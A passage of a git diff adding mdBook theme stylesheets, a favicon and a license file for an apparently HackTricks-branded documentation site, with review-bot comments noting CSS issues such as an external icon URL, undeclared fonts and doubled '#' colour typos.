padding-right: .2rem; + padding-left: .2rem; + +} + +.footer .theme-wrapper .theme-btns button { + padding: .3rem; + margin-top: .3rem; + margin-bottom: .3rem; + margin-right: .5rem; + margin-left: .5rem; + color: var(--icons); + border: none; + background-color: transparent; + cursor: pointer; + font-size: 16px; + vertical-align: middle; +} + +.footer .theme-wrapper .theme-btns button.theme-selected { + color: var(--links); +} + +.footer .theme-wrapper .theme-btns button:hover { + color: var(--icons-hover); +} + +/* Details/Summary */ + +summary { + list-style: none; + display: flex; + align-items: center; + padding: 1.5rem; + color: var(--menu-bar-link-color-hover); + cursor: pointer; +} + +summary::-webkit-details-marker { + display: none; +} + +summary:hover { + color: var(--menu-bar-link-color); +} + +summary::before { + content: ''; + width: 14px; + height: 14px; + mask-image: url("https://ka-p.fontawesome.com/releases/v6.6.0/svgs/regular/chevron-right.svg?v=2&token=a463935e93"); + mask-repeat: no-repeat; + mask-position: center center; + background: currentColor; + margin-right: .5em; + transition: 0.2s; + transform: rotate(0deg); +} + +details[open] > summary::before { + transform: rotate(90deg); +} + +details { + border-radius: 8px; + background-color: var(--bg); + border: 1px solid var(--table-border-color); + font-size: 18px; + font-weight: 100; +} + +details p { + padding-right: 4rem; + padding-left: 4rem; +} + +details ul, details ol { + padding-right: 6rem; + padding-left: 6rem; + padding-bottom: 2rem; + margin-top: 0; +} + +details ul li { + font-size: 16px; + margin-top: .8rem; +} + +details ul li:first-child { + margin-top: 0; +} + +/* Alerts */ +.mdbook-alerts { + padding: 16px 28px 16px 50px !important; + margin-bottom: 16px !important; + border-left: 0 !important; + background-color: var(--mdbook-alerts-color); + border-radius: 5px; + position: relative; +} + +.mdbook-alerts > :nth-child(2) { + margin-top: 0; +} + +.mdbook-alerts-title { + 
display: none !important; +} + +.mdbook-alerts a{ + color: var(--mdbook-alerts-color-link) !important; +} + +.mdbook-alerts a:hover{ + color: var(--mdbook-alerts-color-link-hover) !important; +} + +.mdbook-alerts-tip::before{ + position: absolute; + left: 0; + top: 0; + margin-left: 15px; + margin-top: 15px; + content: "\f05d"; + font-family: FontAwesome; + font-size: 20px; + width: 20px; + height: 20px; + color: var(--mdbook-alerts-color-link); +} + +.mdbook-alerts-note::before{ + position: absolute; + left: 0; + top: 0; + margin-left: 15px; + margin-top: 15px; + content: "\f05a"; + font-family: FontAwesome; + font-size: 20px; + width: 20px; + height: 20px; + color: var(--mdbook-alerts-color-link); +} + +.mdbook-alerts-important::before{ + position: absolute; + left: 0; + top: 0; + margin-left: 15px; + margin-top: 15px; + content: "\f006"; + font-family: FontAwesome; + font-size: 20px; + width: 20px; + height: 20px; + color: var(--mdbook-alerts-color-link); +} + +.mdbook-alerts-warning::before{ + position: absolute; + left: 0; + top: 0; + margin-left: 15px; + margin-top: 15px; + content: "\f06a"; + font-family: FontAwesome; + font-size: 20px; + width: 20px; + height: 20px; + color: var(--mdbook-alerts-color-link); +} + +.mdbook-alerts-caution::before{ + position: absolute; + left: 0; + top: 0; + margin-left: 15px; + margin-top: 15px; + content: "\f071"; + font-family: FontAwesome; + font-size: 20px; + width: 20px; + height: 20px; + color: var(--mdbook-alerts-color-link); +} + +.content_ref { + background-color: var(--bg); + border: 1px solid var(--table-border-color); + border-radius: 8px; + padding-bottom: 1.5rem; + padding-top: 1.5rem; + padding-right: 2rem; + padding-left: 2rem; + display: flex; + justify-content: space-between; + flex-direction: row; + color: var(--fg) !important; + text-decoration: none !important; + font-size: 18px; +} + +.content_ref:hover{ + color: var(--links) !important; + text-decoration: none !important; +} + +.content_ref span{ + 
display: flex; + justify-content: space-between; + width: 100%; + flex-direction: row; + align-items: center; + text-decoration: none !important; +} + +.content_ref span::after{ + content: ''; + width: 14px; + height: 14px; + mask-image: url("https://ka-p.fontawesome.com/releases/v6.6.0/svgs/regular/chevron-right.svg?v=2&token=a463935e93"); + mask-repeat: no-repeat; + mask-position: center center; + background: currentColor; +} + +.tabs-container { + display: flex; + flex-wrap: wrap; + + >input[type="radio"] { + display: none; + + &:checked+.tab-label { + /* this is the active tab */ + background-color: darkslategray; + } + } + + >input[type="radio"]:first-child+.tab-label { + /* target the first tab label */ + border-radius: 50px 0 0 50px; + } + + >input[type="radio"]:last-of-type+.tab-label { + /* target the last tab label */ + border-radius: 0 50px 50px 0; + } + + >input[type="radio"]:not(:checked)+.tab-label+.tab-content { + /* hide inactive tabs */ + display: none; + } + + .tab-label { + padding: 5px 15px; + color: white; + background-color: slategray; + } + + .tab-content { + order: 99; + width: 100%; + margin-top: 15px; + display: block; + } +} + +figure, figcaption{ + text-align: center; +} + +li.chapter-item a.external-link::after { + content: "\f08e"; + font-family: FontAwesome; + /* font-size: 15px; */ + margin-left: 15px; + color: currentColor; +} \ No newline at end of file diff --git a/theme/css/general.css b/theme/css/general.css new file mode 100644 index 000000000..d08e9178d --- /dev/null +++ b/theme/css/general.css 
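Review bot: The two `mask-image: url("https://ka-p.fontawesome.com/releases/v6.6.0/svgs/regular/chevron-right.svg?v=2&token=a463935e93")` rules (on `summary::before` and `.content_ref span::after`) make every rendered page depend on a third-party kit URL with an account-bound token: every reader's browser fetches it from that host, the chevron vanishes if the token is rotated or the kit is removed, and any Content-Security-Policy on the site has to open `img-src` for ka-p.fontawesome.com. The other icons in this file are glyphs via `font-family: FontAwesome` (e.g. `content: "\f08e"`), presumably from the font mdBook bundles, so the chevron should likewise be checked into the theme and referenced relatively, e.g. `mask-image: url("../chevron-right.svg");` — the exact path depends on how extra theme assets are copied, so confirm it against book.toml. Separately, the nested rules inside `.tabs-container { >input[type="radio"] { … } }` rely on native CSS nesting, which browsers without it drop silently (all tab contents then stay visible); flattening them to selectors like `.tabs-container > input[type="radio"]:checked + .tab-label` avoids that.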
@@ -0,0 +1,242 @@ +/* Base styles and content styles */ + +:root { + /* Browser default font-size is 16px, this way 1 rem = 10px */ + font-size: 62.5%; + color-scheme: var(--color-scheme); +} + +html { + font-family: __Inter_a4efb0, __Inter_Fallback_a4efb0, system-ui, arial; + color: var(--fg); + background-color: var(--bg); + text-size-adjust: none; + -webkit-text-size-adjust: none; +} + +body { + margin: 0; + font-size: 1.6rem; + overflow-x: hidden; +} + +code { + font-family: var(--mono-font) !important; + font-size: var(--code-font-size); + direction: ltr !important; +} + +/* make long words/inline code not x overflow */ +main { + overflow-wrap: break-word; +} + +/* make wide tables scroll if they overflow */ +.table-wrapper { + overflow-x: auto; +} + +/* Don't change font size in headers. */ +h1 code, h2 code, h3 code, h4 code, h5 code, h6 code { + font-size: unset; +} + +.left { float: left; } +.right { float: right; } +.boring { opacity: 0.6; } +.hide-boring .boring { display: none; } +.hidden { display: none !important; } + +h2, h3 { margin-block-start: 2.5em; } +h4, h5 { margin-block-start: 2em; } + +.header + .header h3, +.header + .header h4, +.header + .header h5 { + margin-block-start: 1em; +} + +h1:target::before, +h2:target::before, +h3:target::before, +h4:target::before, +h5:target::before, +h6:target::before { + display: inline-block; + content: "»"; + margin-inline-start: -30px; + width: 30px; +} + +/* This is broken on Safari as of version 14, but is fixed + in Safari Technology Preview 117 which I think will be Safari 14.2. 
+ https://bugs.webkit.org/show_bug.cgi?id=218076 +*/ +:target { + /* Safari does not support logical properties */ + scroll-margin-top: calc(var(--menu-bar-height) + 0.5em); +} + +.page { + outline: 0; + padding: 0 var(--page-padding); + margin-block-start: calc(0px - var(--menu-bar-height)); /* Compensate for the #menu-bar-hover-placeholder */ +} +.page-wrapper { + box-sizing: border-box; + background-color: var(--bg); +} +.no-js .page-wrapper, +.js:not(.sidebar-resizing) .page-wrapper { + transition: margin-left 0.3s ease, transform 0.3s ease; /* Animation: slide away */ +} +[dir=rtl] .js:not(.sidebar-resizing) .page-wrapper { + transition: margin-right 0.3s ease, transform 0.3s ease; /* Animation: slide away */ +} + +.content { + overflow-y: auto; + padding: 0 5px 50px 5px; +} +.content main { + margin-inline-start: auto; + margin-inline-end: auto; + max-width: var(--content-max-width); +} +.content nav { + margin-inline-start: auto; + margin-inline-end: auto; + max-width: var(--content-max-width); + margin-top: 20px; +} +.content p { line-height: 1.45em; } +.content ol { line-height: 1.45em; } +.content ul { line-height: 1.45em; } +.content a { text-decoration: none; } +.content a:hover { text-decoration: underline; } +.content img, .content video { max-width: 100%; } +.content .header:link, +.content .header:visited { + color: var(--fg); +} +.content .header:link, +.content .header:visited:hover { + text-decoration: none; +} + +table { + margin: 0 auto; + border-collapse: collapse; +} +table td { + padding: 3px 20px; + border: 1px var(--table-border-color) solid; +} +table thead { + background: var(--table-header-bg); +} +table thead td { + font-weight: 700; + border: none; +} +table thead th { + padding: 3px 20px; +} +table thead tr { + border: 1px var(--table-header-bg) solid; +} +/* Alternate background colors for rows */ +table tbody tr:nth-child(2n) { + background: var(--table-alternate-bg); +} + + +blockquote { + margin: 20px 0; + padding: 0 20px; + 
color: var(--fg); + background-color: var(--quote-bg); + border-block-start: .1em solid var(--quote-border); + border-block-end: .1em solid var(--quote-border); +} + +.warning { + margin: 20px; + padding: 0 20px; + border-inline-start: 2px solid var(--warning-border); +} + +.warning:before { + position: absolute; + width: 3rem; + height: 3rem; + margin-inline-start: calc(-1.5rem - 21px); + content: "ⓘ"; + text-align: center; + background-color: var(--bg); + color: var(--warning-border); + font-weight: bold; + font-size: 2rem; +} + +blockquote .warning:before { + background-color: var(--quote-bg); +} + +kbd { + background-color: var(--table-border-color); + border-radius: 4px; + border: solid 1px var(--theme-popup-border); + box-shadow: inset 0 -1px 0 var(--theme-hover); + display: inline-block; + font-size: var(--code-font-size); + font-family: var(--mono-font); + line-height: 10px; + padding: 4px 5px; + vertical-align: middle; +} + +sup { + /* Set the line-height for superscript and footnote references so that there + isn't an awkward space appearing above lines that contain the footnote. + + See https://github.com/rust-lang/mdBook/pull/2443#discussion_r1813773583 + for an explanation. + */ + line-height: 0; +} + +:not(.footnote-definition) + .footnote-definition, +.footnote-definition + :not(.footnote-definition) { + margin-block-start: 2em; +} +.footnote-definition { + font-size: 0.9em; + margin: 0.5em 0; +} +.footnote-definition p { + display: inline; +} + +.tooltiptext { + position: absolute; + visibility: hidden; + color: #fff; + background-color: #333; + transform: translateX(-50%); /* Center by moving tooltip 50% of its width left */ + left:35%; /* Half of the width of the icon */ + top: -35px; + font-size: 12px; + text-align: center; + border-radius: 6px; + padding: 5px 8px; + margin: 5px; + z-index: 1000; +} +.tooltipped .tooltiptext { + visibility: visible; +} + +.result-no-output { + font-style: italic; +} \ No newline at end of file 
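Review bot: `font-family: __Inter_a4efb0, __Inter_Fallback_a4efb0, system-ui, arial;` on `html` names two families that look like Next.js `next/font`-generated identifiers, and no `@font-face` declaring them appears in any of the theme stylesheets added here, so unless one is injected elsewhere (e.g. in a head.hbs not shown) body text silently falls back to `system-ui`. If Inter is intended, declare it in this file from a self-hosted woff2 and reference it by its real name, `font-family: "Inter", system-ui, arial;`; if not, drop the two generated names so the declaration says what it does. Either way the font file should ship with the theme rather than be referenced from a font CDN, so that a `font-src 'self'` CSP holds and readers' requests do not go to a third-party host.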
diff --git a/theme/css/print.css b/theme/css/print.css
new file mode 100644
index 000000000..80ec3a544
--- /dev/null
+++ b/theme/css/print.css
@@ -0,0 +1,50 @@
+
+#sidebar,
+#menu-bar,
+.nav-chapters,
+.mobile-nav-chapters {
+ display: none;
+}
+
+#page-wrapper.page-wrapper {
+ transform: none !important;
+ margin-inline-start: 0px;
+ overflow-y: initial;
+}
+
+#content {
+ max-width: none;
+ margin: 0;
+ padding: 0;
+}
+
+.page {
+ overflow-y: initial;
+}
+
+code {
+ direction: ltr !important;
+}
+
+pre > .buttons {
+ z-index: 2;
+}
+
+a, a:visited, a:active, a:hover {
+ color: #4183c4;
+ text-decoration: none;
+}
+
+h1, h2, h3, h4, h5, h6 {
+ page-break-inside: avoid;
+ page-break-after: avoid;
+}
+
+pre, code {
+ page-break-inside: avoid;
+ white-space: pre-wrap;
+}
+
+.fa {
+ display: none !important;
+}
diff --git a/theme/css/variables.css b/theme/css/variables.css
new file mode 100644
index 000000000..fbe328e4d
--- /dev/null
+++ b/theme/css/variables.css
@@ -0,0 +1,484 @@
+
+/* Globals */
+
+:root {
+ --sidebar-width: 300px;
+ --sidebar-resize-indicator-width: 8px;
+ --sidebar-resize-indicator-space: 2px;
+ --page-padding: 15px;
+ --content-max-width: 750px;
+ --container-max-width: 1500px;
+ --menu-bar-height: 64px;
+ --footer-height: 75px;
+ --mono-font: "Source Code Pro", Consolas, "Ubuntu Mono", Menlo, "DejaVu Sans Mono", monospace, monospace;
+ --code-font-size: 0.875em /* please adjust the ace font size accordingly in editor.js */
+}
+
+/* Themes */
+
+.ayu {
+ --bg: hsl(210, 25%, 8%);
+ --fg: #c5c5c5;
+
+ --sidebar-bg: #14191f;
+ --sidebar-fg: #c8c9db;
+ --sidebar-non-existant: #5c6773;
+ --sidebar-active: #ffb454;
+ --sidebar-spacer: #2d334f;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #737480;
+ --icons-hover: #b7b9cc;
+
+ --links: #0096cf;
+
+ --inline-code-color: #ffb454;
+
+ --theme-popup-bg: #14191f;
+ --theme-popup-border: #5c6773;
+ --theme-hover: #191f26;
+
+ --quote-bg: hsl(226, 15%, 17%);
+ --quote-border: hsl(226, 15%, 22%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(210, 25%, 13%);
+ --table-header-bg: hsl(210, 25%, 28%);
+ --table-alternate-bg: hsl(210, 25%, 11%);
+
+ --searchbar-border-color: #848484;
+ --searchbar-bg: #424242;
+ --searchbar-fg: #fff;
+ --searchbar-shadow-color: #d4c89f;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #888;
+ --searchresults-li-bg: #252932;
+ --search-mark-bg: #e3b171;
+
+ --color-scheme: dark;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(45%) sepia(6%) saturate(621%) hue-rotate(198deg) brightness(99%) contrast(85%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(68%) sepia(55%) saturate(531%) hue-rotate(341deg) brightness(104%) contrast(101%);
+}
+
+.coal {
+ --bg: hsl(200, 7%, 8%);
+ --fg: #98a3ad;
+
+ --sidebar-bg: #292c2f;
+ --sidebar-fg: #a1adb8;
+ --sidebar-non-existant: #505254;
+ --sidebar-active: #3473ad;
+ --sidebar-spacer: #393939;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #43484d;
+ --icons-hover: #b3c0cc;
+
+ --links: #2b79a2;
+
+ --inline-code-color: #c5c8c6;
+
+ --theme-popup-bg: #141617;
+ --theme-popup-border: #43484d;
+ --theme-hover: #1f2124;
+
+ --quote-bg: hsl(234, 21%, 18%);
+ --quote-border: hsl(234, 21%, 23%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(200, 7%, 13%);
+ --table-header-bg: hsl(200, 7%, 28%);
+ --table-alternate-bg: hsl(200, 7%, 11%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #b7b7b7;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #98a3ad;
+ --searchresults-li-bg: #2b2b2f;
+ --search-mark-bg: #355c7d;
+
+ --color-scheme: dark;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(26%) sepia(8%) saturate(575%) hue-rotate(169deg) brightness(87%) contrast(82%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(36%) sepia(70%) saturate(503%) hue-rotate(167deg) brightness(98%) contrast(89%);
+}
+
+.light, html:not(.js) {
+ --bg: hsl(0, 0%, 100%);
+ --fg: hsl(0, 0%, 0%);
+
+ --sidebar-bg: #fafafa;
+ --sidebar-fg: hsl(0, 0%, 0%);
+ --sidebar-non-existant: #aaaaaa;
+ --sidebar-active: #1f1fff;
+ --sidebar-spacer: #f4f4f4;
+
+ --scrollbar: #8F8F8F;
+
+ --icons: #747474;
+ --icons-hover: #000000;
+
+ --links: #20609f;
+
+ --inline-code-color: #301900;
+
+ --theme-popup-bg: #fafafa;
+ --theme-popup-border: #cccccc;
+ --theme-hover: #e6e6e6;
+
+ --quote-bg: hsl(197, 37%, 96%);
+ --quote-border: hsl(197, 37%, 91%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(0, 0%, 95%);
+ --table-header-bg: hsl(0, 0%, 80%);
+ --table-alternate-bg: hsl(0, 0%, 97%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #fafafa;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #888;
+ --searchresults-li-bg: #e4f2fe;
+ --search-mark-bg: #a2cff5;
+
+ --color-scheme: light;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(45.49%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(14%) sepia(93%) saturate(4250%) hue-rotate(243deg) brightness(99%) contrast(130%);
+}
+
+.navy {
+ --bg: hsl(226, 23%, 11%);
+ --fg: #bcbdd0;
+
+ --sidebar-bg: #282d3f;
+ --sidebar-fg: #c8c9db;
+ --sidebar-non-existant: #505274;
+ --sidebar-active: #2b79a2;
+ --sidebar-spacer: #2d334f;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #737480;
+ --icons-hover: #b7b9cc;
+
+ --links: #2b79a2;
+
+ --inline-code-color: #c5c8c6;
+
+ --theme-popup-bg: #161923;
+ --theme-popup-border: #737480;
+ --theme-hover: #282e40;
+
+ --quote-bg: hsl(226, 15%, 17%);
+ --quote-border: hsl(226, 15%, 22%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(226, 23%, 16%);
+ --table-header-bg: hsl(226, 23%, 31%);
+ --table-alternate-bg: hsl(226, 23%, 14%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #aeaec6;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #5f5f71;
+ --searchresults-border-color: #5c5c68;
+ --searchresults-li-bg: #242430;
+ --search-mark-bg: #a2cff5;
+
+ --color-scheme: dark;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(46%) sepia(20%) saturate(1537%) hue-rotate(156deg) brightness(85%) contrast(90%);
+}
+
+.rust {
+ --bg: hsl(60, 9%, 87%);
+ --fg: #262625;
+
+ --sidebar-bg: #3b2e2a;
+ --sidebar-fg: #c8c9db;
+ --sidebar-non-existant: #505254;
+ --sidebar-active: #e69f67;
+ --sidebar-spacer: #45373a;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #737480;
+ --icons-hover: #262625;
+
+ --links: #2b79a2;
+
+ --inline-code-color: #6e6b5e;
+
+ --theme-popup-bg: #e1e1db;
+ --theme-popup-border: #b38f6b;
+ --theme-hover: #99908a;
+
+ --quote-bg: hsl(60, 5%, 75%);
+ --quote-border: hsl(60, 5%, 70%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(60, 9%, 82%);
+ --table-header-bg: #b3a497;
+ --table-alternate-bg: hsl(60, 9%, 84%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #fafafa;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #888;
+ --searchresults-li-bg: #dec2a2;
+ --search-mark-bg: #e69f67;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(77%) sepia(16%) saturate(1798%) hue-rotate(328deg) brightness(98%) contrast(83%);
+}
+
+@media (prefers-color-scheme: dark) {
+ html:not(.js) {
+ --bg: hsl(200, 7%, 8%);
+ --fg: #98a3ad;
+
+ --sidebar-bg: #292c2f;
+ --sidebar-fg: #a1adb8;
+ --sidebar-non-existant: #505254;
+ --sidebar-active: #3473ad;
+ --sidebar-spacer: #393939;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #43484d;
+ --icons-hover: #b3c0cc;
+
+ --links: #2b79a2;
+
+ --inline-code-color: #c5c8c6;
+
+ --theme-popup-bg: #141617;
+ --theme-popup-border: #43484d;
+ --theme-hover: #1f2124;
+
+ --quote-bg: hsl(234, 21%, 18%);
+ --quote-border: hsl(234, 21%, 23%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(200, 7%, 13%);
+ --table-header-bg: hsl(200, 7%, 28%);
+ --table-alternate-bg: hsl(200, 7%, 11%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #b7b7b7;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #98a3ad;
+ --searchresults-li-bg: #2b2b2f;
+ --search-mark-bg: #355c7d;
+
+ --color-scheme: dark;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(26%) sepia(8%) saturate(575%) hue-rotate(169deg) brightness(87%) contrast(82%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(36%) sepia(70%) saturate(503%) hue-rotate(167deg) brightness(98%) contrast(89%);
+ }
+}
+
+.hacktricks-dark {
+ --bg: hsl(0, 0%, 11%);
+ --fg: #ffffff;
+
+ --menu-bar-link-color: #b8b8b8;
+ --menu-bar-link-color-hover: #ffffff;
+
+ --sidebar-bg: hsl(0, 0%, 11%);
+ --sidebar-bg-hover: #2f2f2f;
+ --sidebar-fg: #c0c0c0;
+ --sidebar-non-existant: #505274;
+ --sidebar-active: #496dff;
+ --sidebar-spacer: #2d334f;
+
+ --scrollbar: var(--sidebar-fg);
+
+ --icons: #ffffff;
+ --icons-hover: #b7b9cc;
+
+ --links: #496dff;
+
+ --inline-code-color: #c5c8c6;
+
+ --theme-popup-bg: #161923;
+ --theme-popup-border: #737480;
+ --theme-hover: #2f2f2f;
+
+ --quote-bg: hsl(226, 15%, 17%);
+ --quote-border: hsl(226, 15%, 22%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: #2f2f2f;
+ --table-header-bg: hsl(226, 23%, 31%);
+ --table-alternate-bg: hsl(226, 23%, 14%);
+
+ --searchbar-border-color: #2f2f2f;
+ --searchbar-bg: hsl(0, 0%, 11%);
+ --searchbar-fg: #ffffff;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #b7b9cc;
+ --searchresults-border-color: #2f2f2f;
+ --searchresults-li-bg: hsl(0, 0%, 11%);
+ --search-mark-bg: #a2cff5;
+
+ --sponsor-fg: #cfcdcd;
+
+ --color-scheme: dark;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(46%) sepia(20%) saturate(1537%) hue-rotate(156deg) brightness(85%) contrast(90%);
+
+ .mdbook-alerts-note {
+ --mdbook-alerts-color: rgba(1, 1, 1, 0.04) !important;
+ --mdbook-alerts-color-link: rgb(73, 109, 255) !important;
+ --mdbook-alerts-color-link-hover: rgb(112, 139, 250) !important;
+ }
+
+ .mdbook-alerts-tip {
+ --mdbook-alerts-color: rgba(34, 197, 94, 0.08) !important;
+ --mdbook-alerts-color-link: rgb(74 222 128) !important;
+ --mdbook-alerts-color-link-hover: rgb(134 239 172) !important;
+ }
+
+ .mdbook-alerts-important {
+ --mdbook-alerts-color: rgb(130, 80, 223) !important;
+ --mdbook-alerts-color-link: rgb(130, 80, 223) !important;
+ --mdbook-alerts-color-link-hover: rgb(130, 80, 223) !important;
+ }
+
+ .mdbook-alerts-warning {
+ --mdbook-alerts-color: rgba(249, 115, 22, 0.08) !important;
+ --mdbook-alerts-color-link: rgba(249, 115, 22, 0.08) !important;
+ --mdbook-alerts-color-link-hover: rgba(249, 115, 22, 0.08) !important;
+ }
+
+ .mdbook-alerts-caution {
+ --mdbook-alerts-color: rgba(239, 68, 68, 0.08) !important;
+ --mdbook-alerts-color-link: rgb(248 113 113) !important;
+ --mdbook-alerts-color-link-hover: rgb(252 165 165) !important;
+ }
+
+}
+
+.hacktricks-light {
+ --bg: hsl(0, 0%, 100%);
+ --fg: hsl(0, 0%, 0%);
+
+ --menu-bar-link-color: #747474;
+ --menu-bar-link-color-hover: #000000;
+
+ --sidebar-bg: #fff;
+ --sidebar-bg-hover: ##f6f6f6;
+ --sidebar-fg: hsl(0, 0%, 0%);
+ --sidebar-non-existant: #aaaaaa;
+ --sidebar-active: #496dff;
+ --sidebar-spacer: #f4f4f4;
+
+ --scrollbar: #8F8F8F;
+
+ --icons: #747474;
+ --icons-hover: #000000;
+
+ --links: #496dff;
+
+ --inline-code-color: #301900;
+
+ --theme-popup-bg: #fafafa;
+ --theme-popup-border: #cccccc;
+ --theme-hover: ##f6f6f6;
+
+ --quote-bg: hsl(197, 37%, 96%);
+ --quote-border: hsl(197, 37%, 91%);
+
+ --warning-border: #ff8e00;
+
+ --table-border-color: hsl(0, 0%, 95%);
+ --table-header-bg: hsl(0, 0%, 80%);
+ --table-alternate-bg: hsl(0, 0%, 97%);
+
+ --searchbar-border-color: #aaa;
+ --searchbar-bg: #fafafa;
+ --searchbar-fg: #000;
+ --searchbar-shadow-color: #aaa;
+ --searchresults-header-fg: #666;
+ --searchresults-border-color: #888;
+ --searchresults-li-bg: #e4f2fe;
+ --search-mark-bg: #a2cff5;
+
+ --sponsor-fg: #333333;
+
+ --color-scheme: light;
+
+ /* Same as `--icons` */
+ --copy-button-filter: invert(45.49%);
+ /* Same as `--sidebar-active` */
+ --copy-button-filter-hover: invert(14%) sepia(93%) saturate(4250%) hue-rotate(243deg) brightness(99%) contrast(130%);
+
+
+
+ .mdbook-alerts-note {
+ --mdbook-alerts-color: rgba(0.098353, 0.098353, 0.098353, 0.04) !important;
+ --mdbook-alerts-color-link: rgb(9, 105, 218) !important;
+ --mdbook-alerts-color-link-hover: rgb(9, 105, 218) !important;
+ }
+
+ .mdbook-alerts-tip {
+ --mdbook-alerts-color: rgba(34, 197, 94, 0.08) !important;
+ --mdbook-alerts-color-link: rgb(22 101 52) !important;
+ --mdbook-alerts-color-link-hover: rgb(20 83 45) !important;
+ }
+
+ .mdbook-alerts-important {
+ --mdbook-alerts-color: rgb(130, 80, 223) !important;
+ --mdbook-alerts-color-link: rgb(130, 80, 223) !important;
+ --mdbook-alerts-color-link-hover: rgb(130, 80, 223) !important;
+ }
+
+ .mdbook-alerts-warning {
+ --mdbook-alerts-color: rgba(249, 115, 22, 0.08) !important;
+ --mdbook-alerts-color-link: rgba(249, 115, 22, 0.08) !important;
+ --mdbook-alerts-color-link-hover: rgba(249, 115, 22, 0.08) !important;
+ }
+
+ .mdbook-alerts-caution {
+ --mdbook-alerts-color: rgba(239, 68, 68, 0.08) !important;
+ --mdbook-alerts-color-link: rgb(153 27 27) !important;
+ --mdbook-alerts-color-link-hover: rgb(127 29 29) !important;
+ }
+}
\ No newline at end of file
diff --git a/theme/favicon.png b/theme/favicon.png
new file mode 100644
index 000000000..1671d0bf8
Binary files /dev/null and b/theme/favicon.png differ
diff --git a/theme/favicon.svg b/theme/favicon.svg
new file mode 100644
index 000000000..3cd2d0ee8
--- /dev/null
+++ b/theme/favicon.svg
@@ -0,0 +1,21 @@
+ + + + + + + + + + + + + + + + +
\ No newline at end of file
diff --git a/theme/fonts/OPEN-SANS-LICENSE.txt b/theme/fonts/OPEN-SANS-LICENSE.txt
new file mode 100644
index 000000000..d64569567
--- /dev/null
+++ b/theme/fonts/OPEN-SANS-LICENSE.txt
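Review bot: In the `.hacktricks-light` block the declarations `--sidebar-bg-hover: ##f6f6f6;` and `--theme-hover: ##f6f6f6;` carry a doubled `#`, which is not a valid color, so any property that consumes `var(--sidebar-bg-hover)` or `var(--theme-hover)` becomes invalid at computed-value time and the light-theme hover backgrounds are silently lost; the fix is `--sidebar-bg-hover: #f6f6f6;` and `--theme-hover: #f6f6f6;`. The `.mdbook-alerts-warning` rules in both `.hacktricks-dark` and `.hacktricks-light` reuse the 8%-alpha background `rgba(249, 115, 22, 0.08)` for `--mdbook-alerts-color-link` and `--mdbook-alerts-color-link-hover`, whereas every other alert kind uses an opaque link color, so link text inside warning alerts is presumably close to invisible. The light-theme `.mdbook-alerts-note` value `rgba(0.098353, 0.098353, 0.098353, 0.04)` uses fractional channel numbers, which older color parsers reject outright; if a near-black tint is intended it should be stated in 0–255 terms. The nested `.mdbook-alerts-*` rules inside the two theme blocks depend on native CSS nesting, which browsers without that support drop entirely, so a comment such as `/* nested rules require CSS Nesting support; unsupported browsers keep the mdbook-alerts defaults */` would document the accepted fallback.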
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
